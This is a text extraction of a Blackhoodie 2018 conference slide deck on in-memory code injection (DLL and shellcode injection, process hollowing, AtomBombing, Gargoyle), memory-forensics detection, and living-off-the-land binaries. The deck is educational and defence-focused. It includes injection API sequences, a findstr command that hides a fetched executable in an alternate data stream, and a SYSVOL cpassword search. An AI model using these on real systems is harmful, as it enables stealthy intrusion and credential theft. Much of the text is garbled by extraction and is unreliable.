Transcription

Hidden in plain sight?Blackhoodie 2018

Hidden in plain sightEssy - @casheeew3rd time Blackhoodie attendeeI’m really just curious (:(it’s addictive)

Hidden in plain sightEssy - @casheeew3rd time Blackhoodie attendeeI’m really just curious (:(it’s addictive)The infamous shoulder of giantssee credits at the end

rundll32 w do they work?What is this in memory stuff?How do we detect it?Living off the land playgroundConclusionRabbitholes

rundll32 w do they work?What is this in memory stuff?How do we detect it?Living off the land playgroundConclusionRabbitholesIt’s been a long dayYou’ve heard a lot of stuff.Let’s try to keep it relaxed (:

msbuild.exe attack lC2Tools &TechniquesActions

InstallUtil.exe /U Tools.dll- - Bloodhound- Metasploit Framework- PowerShell Empire- .see ation

-Graph theory to revealrelationships in ADs-Goal: Quickly identify complexattack paths-Graph queries are build viaCypher- memberOf- hasSession- AdminTo- ACLs- CanRDP- .-Red & Blue team toolBloodhoundDeveloped:Author:2016Andrew Robbins,Rohan Vazarkar,Will SchroederTechnology:JavascriptElectronneo4jPS/C# ingestorTechniques:Visualizerelationships

MeterpreterMetasploit FrameworkDeveloped:Author:2003H.D. MooreLanguage:RubyTechnqiues:Public exploits,post exploitationmodules, auxiliarymodules, .-advanced multifunctionpayloadmulti platformencrypted communicationProcess injection- injects itself into a runningprocess- uses reflective DLLinjection- metsrv.dll’s header can bemodified to be usable asshellcode

PowerShell EmpireDeveloped:Author:2015Will Schroeder,Matt Nelson,Justin ploitationwithout powershell.exeModules- code execution- collection- credentials- lateral movement- management- persistence- privesc- situational awareness- trollsploitProcess injectionlauncher code for the agent isembedded in the .DLLAfter the initial payload allsubsequent attacks are stored inmemory

But how does it work?

(In)-Memory stuff & Code injectionTechniques:- Remote DLL injection- Remote Shellcode injection- Reflective DLL injection- Process Hollowing- APC injections- Atombombing- Gargoyle (ROP/APCs)- Injection via Shims- Inline Hooking- insert more rabbit holes here

(In)-Memory stuff & Code injectionTechniques:- Remote DLL injection- Remote Shellcode injection- Reflective DLL injection- Process Hollowing- APC injections- Atombombing- Gargoyle (ROP/APCs)- Injection via Shims- Inline Hooking- insert more rabbit holes here Disk

Remote DLL injectionPROCESS CREATE THREADPROCESS VM OPERATIONPROCESS VM WRITEOur processVictim processOpenProcess()PAGE READWRITEVirtualAllocEx()Typical API Handle()GetProcAddress()CreateRemoteThread- LoadLibraryevil.dll--LdrLoadDll (native)evil.dll

Hidden in plain sight?

Remote DLL injection - Detection examples-not easy to distinguish between malicious DLL and explicitly loadedDLLs in the victim process (‘LoadLibrary’)-injected DLL hides in plain side, just try- listdlls- Process Explorer- Process Hacker-it blends in with legitmate modules-Chances of detection are higher if we try to hide the DLL, e.g.- unlink its entry from LDR DATA TABLE ENTRY (ldrmodules)- unpack and copy decompressed code to new memory region-Typical API eateRemoteThread- LoadLibraryModern detections track & flag ‘CreateRemoteThread’--LdrLoadDll (native)

Remote DLL injection - Detection examples-not easy to distinguish between malicious DLL and explicitly loadedDLLs in the victim process (‘LoadLibrary’)-injected DLL hides in plain side, just try- listdlls- Process Explorer- Process Hacker-it blends in with legitmate modules-Chances of detection are higher if we try to hide the DLL, e.g.- unlink its entry from LDR DATA TABLE ENTRY (ldrmodules)- unpack and copy decompressed code to new memory region-Typical API eateRemoteThread- LoadLibraryModern detections track & flag ‘CreateRemoteThread’not fancy enough, let’s move on.--LdrLoadDll (native)

Remote Shellcode injection1.2.3.Our process allocates memory in the victim processusing ‘VirtualAllocEx’ with the‘PAGE EXECUTE READWRITE’ protectionOur process transfers a block of code to the victimprocess using ‘WriteProcessMemory’Our process calls ‘CreateRemoteThread’ and points thethread’s starting address to a function within thetransferred block of code inside the victim processTypical API eateRemoteThread--LdrLoadDll (native)

Hidden in plain sight?

Remote shellcode injection - Detection examplesTools to investigate:- Process Hacker- Process Explorer (Sysinternals)- listdlls (Sysinternals command-line utility)- Or use the Windows API functions (see CreateToolhelp32Snapshot)-Volatility plugin ‘malfind’- look for readable, writeable and executable private memoryregions- regions will contain shellcode (or PE header)- malfind displays hex dump and disassemblyTypical API eateRemoteThread--LdrLoadDll (native)

Remote shellcode injection - Detection examplesTools to investigate:- Process Hacker- Process Explorer (Sysinternals)- listdlls (Sysinternals command-line utility)- Or use the Windows API functions (see CreateToolhelp32Snapshot)-Volatility plugin ‘malfind’- look for readable, writeable and executable private memoryregions- regions will contain shellcode (or PE header)- malfind displays hex dump and disassemblyTypical API eateRemoteThread--LdrLoadDll (native)still too easy.let’s try harder

Reflective DLL injectionresponsible for loading itselfimplements minimal PE file loaderOur processrecv(evil.dll, buff)evil.dllTypical API callsVictim d()GetProcAddress()CreateRemoteThread( xtOpenProcessVirtualAllocExWriteProcessMemory! eadsee tion

“[.], Empire has the ability to inject an agent into another process usingReflectivePick to load up the .NET common language runtime into a process and executea particular PowerShell command, all without starting a new powershell.exe process!”see https://www.powershellempire.com/?page id 273“ [.] a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly intoits memory space that supports the running of Powershell code usingSystem.Management.Automation. Due to its' reflective property, it can be injected into anyprocess using a reflective injector and allows the execution of Powershell code by any process”see e/master/PowerPick

Hidden in plain sight?

Reflective DLL injection - Detection examples-Again: primary signal: Memory events-several larger RWX sections mappedinto the processallocation sizeallocation historythread informationallocation flagsVolatility plugin ‘malfind’- look for RWX pagesHow Windows Defender ATP does -windows-defender-atp/ !address -F:PAGE EXECUTE READWRITE

Reflective DLL injection - Detection examples-Again: primary signal: Memory events-several larger RWX sections mappedinto the processallocation sizeallocation historythread informationallocation flagsVolatility plugin ‘malfind’- look for RWX pagesHow Windows Defender ATP does -windows-defender-atp/Well, well, well. Can we get fancier? !address -F:PAGE EXECUTE READWRITE

Process Hollowing*Legitimate process is loaded to act as a container for hostile code1.2.3.4.5.6.7.Create a process in suspended stateCall ‘ZwUnmapViewSection’ to un-reserve the memoryAllocate memory using ‘VirtualAlloc’Write data to the process memory using ‘WriteProcessMemory’Get the thread context via ‘GetThreadContext’Modify it and set the desired context via ‘SetThreadContext’Call ‘ResumeThread’ to start the processTypical API callsC:\Windows\system32\calc.exePID 1337PEBntdll.dllkernel32.dllMalware (no fileassociation needed)PID readContextResumeThreadVirtualProtectEx* see links at the end for a PoC

Hidden in plain sight?

Process Hollowing - Detection examples-Volatility- dlllist- ldrmodules- malfind # Show suspicious memory protection- Hollowfind plugin # finds discrapancy in the VAD and PEBInvestigation Hollow Process Injection Using Memory Forensics take a look here python vol.py -f victim.vmem dlllist -p 1337 python vol.py -f victim.vmem ldrmodules -p 1337 python vol.py -f victim.vmem malfind -p 1337 python vol.py -f victim.vmem hollowfind -p 1337 -D dump/

Atom BombingGlobal Atom TableOur processGlobalAddAtom() 16-bit integer malicious codeGlobalGetAtomName()via APCVictim processRW permissionsTypical API callscopy of malicious codeGlobalAddAtomRWX permissionsROPGlobalGetAtomNameCreateRemoteThread( )malicious ntextThread

Atom Bombing -v-We avoid writing to the victim process with traditional meansWe put our shellcode in the global atom table viaGlobalAddAtom()We queue APC to call GlobalGetAtomName()We let it gradually build shellcode in a code caveWe use APC again to execute ROP chain to copy to RWXmemory via ZwAllocateVirtualMemory()Typical API alMemoryNtQueueApcThreadNtSetContextThread

Evading memory scannersThis is not the DLL you’re looking forsee ‘The Art of Memory Forensics’

Evading memory scanners - GargoyleTypical API rotectExsee analysis-evasion.html

.but let’s move on

“Living off the land”

Living off the landExecuteAWL ntialsCopyDumpUploadEncodedir C:\Windows\system32\*.exe /s /b findstr /v .exe todo.txt*** Alternate Data Streams** sry not sry for the german only phun

Living off the land - findstr.exeExecuteAWL tialsCopyDumpUploadEncodefindstr /V /L TheCakeIsALie \\webdavsrv\folder\file.exe c:\ADS\file.txt:file.exefindstr /S /I cpassword \\sysvol\policies\*.xmlthx @Oddvarmoesee https://adsecurity.org/?p 2288

Living off the land - rundll32.exeExecuteAWL tialsCopyDumpUploadEncodethx @subtee

Living off the land -vhttps://lolbas-project.github.io/

return conclusion-Hidden depends on your viewpoint--Life gets harder for red teamers and attackers?--some techniques are pretty advancedsome detections are pretty good approach to blend in with normal (admin) usage becomes more and more appealing“Living off the land” techniques combined with advanced in-memoryexecutions: new path of hope to avoid detections? Hype?-Tools to visualise stuff on the blue side-RedTeam tooling switches from PS to C#, but that’s atopic for another rabbit hole (;

Expand-Archive -Path presentation.zip -DestinationPath C:\hereberabbitholes[Code] - Bloodhound Repository[Recording] - Extending BloodHound for Red Teamers - Tom Porter[Blog] - Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin[Blog] - Using Bloodhound to Map the Domain[Recording] - Bloodhound: He Attac, but he also Protec - Andy Robbins, Rohan Vazarkar[Blog] - Hidden Administrative Accounts: BloodHound to the Rescue[Links] Active Directory Attacks and Modern Post Exploitation Adversary Tradecraft[Presentation] - Meterpreter internals[Doku] - Meterpreter Stageless Mode[Code] - Powershell Empire Repository[Recording] - PowerShell Empire - Dave Hull[Recording] - PowerShell Empire Strikes Back by Walter Legowski[Recording] - Learn PowerShell Empire 2 From A to Z[Code] - PowerPick Code Repository[Recording] - Taking Hunting to the Next Level: Hunting in Memory - SANS Threat Hunting Summit 2017[Blog] - Loading a DLL from memory[Blog] - Hunting in Memory[Blog] - PowerShell: In-Memory Injection Using CertUtil.exe[Blog] - Memory injection like a boss[Code] - ReflectiveDLL Injection Repository[Blog] - Reflective DLL Injection with PowerShell[Recording] - Reflective DLL Injection Metasploit Module[Blog] - Metasploit Payload-Types[Paper] - Remote library injection

Expand-Archive -Path presentation.zip -DestinationPath C:\hereberabbitholes[Whitepaper] - Who needs malware, How advasaries use fileless attacks to evade your security[Blog] - Attack Mitre Process Hollowing technique[Recording] - Investigation Hollow Process Ijection Using Memory Forensics[Blog] - Reversing and investigating malware evasive tactivs - Hollow process injection[Code] - PoC Process Hollowing by FuzzySecurity (Start-Hollow.ps1)[Blog] - Bypassing Memory Scanners with Cobalt Strike and Gargoyle[Presentation] - Memory resident implants - code injection is alive and well by Luke Jennings[Blog] - Gargoyle, a memory scanning evasion technique[Code] - Gargoyle Code Repository[Blog] - Hunting for Gargoyle[Code] - The Memory Process File System[Recording] - Living Off The Land A Minimalist S Guide To Windows Post Exploitation - Chris Campbell, Matt Graeber[Recording] - LOLBins Nothing to LOL about - Oddvar Moe[Blog] - LOLBAS project website[Code] - LOLBAS code repository[Book] - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory[Book] - The Hacker Playbook 3: Practical Guide To Penetration Testing[Book] - What makes it page? The Windows 7 (x64) Virtual Memory Manager[Whitepaper] - Living off the land and fileless attack techniques by Symantec[Tools] - Awesome Windows Post-Exploitation tool list

Awesome people to follow for these other exciting [email protected]@ [email protected] dk [email protected]@[email protected] [email protected] [email protected]@[email protected] [email protected]@[email protected] many many more I guess.

wmic.exe /node:”audience” process call create “questions.exe”

a particular PowerShell command, all without starting a new powershell.exe process!" . [Blog] - Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin [Blog] - Using Bloodhound to Map the Domain [Recording] - Bloodhound: He Attac, but he also Protec - Andy Robbins, Rohan Vazarkar